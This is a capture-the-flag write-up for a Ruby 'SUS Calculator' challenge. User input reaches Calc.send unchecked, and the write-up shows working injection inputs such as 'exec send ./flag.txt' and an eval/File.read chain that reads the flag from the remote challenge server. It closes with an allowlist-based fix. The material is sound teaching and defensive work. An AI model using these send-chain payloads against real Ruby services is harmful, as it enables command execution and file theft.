MisTrale Write Up
๐Ÿง SUS Calculator

📖 Challenge Statement

#!/usr/local/bin/ruby

class Calc
  def self.+ left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left + right
  end

  def self.- left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left - right
  end

  def self.* left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left * right
  end

  def self./ left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left / right
  end

  def self.% left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left % right
  end
end

STDOUT.sync = true
puts <<~HEADER
  SUS Calculator (Super Ultra Safe Calculator)
  I heard using eval for these calculator apps is bad, so I made sure to avoid it
  Good luck doing anything malicious here >:)

HEADER

loop do
  print "> "
  cmd = gets.chomp.split

  if cmd.size != 3
    puts "Usage: num (+|-|*|/|%) num"
    next
  end

  left, op, right = cmd
  puts Calc.send(op.to_sym, left, right)
end

🚩 Getting the Flag

Let's begin by analyzing the script:

  • We have a calculator performing basic operations.
  • The operations are executed using class methods.

At first glance, there doesn't seem to be any vulnerability. There is no eval on our input, and the arithmetic itself is harmless.

However, upon reflection, we realize that op, which is supposed to be the operator, is passed straight to Calc.send, so whatever string we type becomes the name of a method called on the Calc class. What if we provided a method name that doesn't exist?

$ ruby chal.rb 
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> 1 + 1
2
> a a a
chal.rb:57:in `block in <main>': undefined method `a' for Calc:Class (NoMethodError)
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

Now we need to find a method that exists on the Calc class (including everything it inherits from Object and Kernel) but isn't one of the five operators used in the script.

That's when I found the send method, which allows us to call a class method by passing its name as a parameter.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send a
chal.rb:57:in `exec': No such file or directory - a (Errno::ENOENT)
        from chal.rb:57:in `block in <main>'
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

The input `exec send a` becomes `Calc.send(:send, "exec", "a")`, which collapses to `Calc.exec("a")`. Kernel#exec is a private method, but send ignores visibility, so the calculator tried to run a program named `a`. That is a very good command injection vulnerability. Now we just need to use it to read the flag.txt file.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send flag.txt
chal.rb:57:in `exec': No such file or directory - flag.txt (Errno::ENOENT)
        from chal.rb:57:in `block in <main>'
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

Well, that's unfortunate... exec with a bare name looks the program up in PATH, and there is no program called flag.txt. Let's try a path instead.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send ./flag.txt
./flag.txt: 1: jail{flag_will_be_here_on_remote}: not found

Letโ€™s try running this remotely:

$ nc challs1.pyjail.club 5456

SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send ./flag.txt
/app/run:57:in `exec': Permission denied - ./flag.txt (Errno::EACCES)
        from /app/run:57:in `block in <main>'
        from <internal:kernel>:187:in `loop'
        from /app/run:47:in `<main>'

Well, on the remote the flag file isn't executable, so exec can't run it and we need to try something else. Kernel#eval is reachable through the same send chain, so let's use it to read the file instead of executing it.

$ nc challs1.pyjail.club 5456
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> eval send File.read("flag.txt")
jail{me_when_i_uhhh_escape}

And there you have it, the flag!
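The root cause is that a user-controlled string is used as a method name with no restriction. As an added example (my code, not the challenge author's), here is the same calculator dispatched through an explicit operator allowlist, together with a check showing why a respond_to? guard alone would not have closed the hole: send is a public method inherited from Object, so it passes such a guard and then ignores visibility for the inner exec/eval call. The names safe_calc, OPERATORS and respond_to_check_accepts? are mine.

```ruby
# Added example, not the challenge author's code: the SUS Calculator's
# dispatcher rebuilt around an explicit operator allowlist, plus a check
# showing why a weaker fix would not have closed the hole.

# Same arithmetic as the challenge's Calc class, defined compactly.
class Calc
  [:+, :-, :*, :/, :%].each do |op|
    define_singleton_method(op) do |left, right|
      left = left.to_i if left.is_a?(String)
      right = right.to_i if right.is_a?(String)
      left.public_send(op, right)
    end
  end
end

# The only method names user input may ever select.
OPERATORS = %w[+ - * / %].freeze

# Evaluates one "num op num" line. Returns an Integer on success, or an
# explanatory String when the line is rejected. Unlike the original, a
# non-numeric operand is refused instead of being silently to_i'd to 0.
def safe_calc(line)
  cmd = line.split
  return "Usage: num (+|-|*|/|%) num" unless cmd.size == 3

  left, op, right = cmd
  # Allowlist first: "send", "exec", "eval" and friends never reach Calc.
  return "Unknown operator: #{op}" unless OPERATORS.include?(op)
  return "Operands must be integers" unless [left, right].all? { |s| s.match?(/\A-?\d+\z/) }

  Calc.public_send(op, left, right)
rescue ZeroDivisionError
  "Division by zero"
end

# A tempting but insufficient fix: only dispatch when Calc.respond_to?(op).
# Private Kernel methods (exec, eval) are hidden from respond_to?, but
# `send` is a public method inherited from Object, so the two-step chain
# used in the write-up ("exec send ...") would still pass this check.
def respond_to_check_accepts?(op)
  Calc.respond_to?(op.to_sym)
end

# Quick demonstration when run directly (constructed sample inputs).
if __FILE__ == $PROGRAM_NAME
  ["1 + 1", "10 % 3", "exec send ./flag.txt", 'eval send File.read("flag.txt")', "7 / 0"].each do |line|
    puts "> #{line}"
    puts safe_calc(line)
  end
  puts "respond_to?(:send) = #{respond_to_check_accepts?('send')}"  # true
  puts "respond_to?(:exec) = #{respond_to_check_accepts?('exec')}"  # false
end
```

The allowlist is checked before anything is dispatched, so the method name the user typed is only ever one of five known strings; rejecting non-integer operands is a tightening beyond the original, which silently turned junk into 0.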
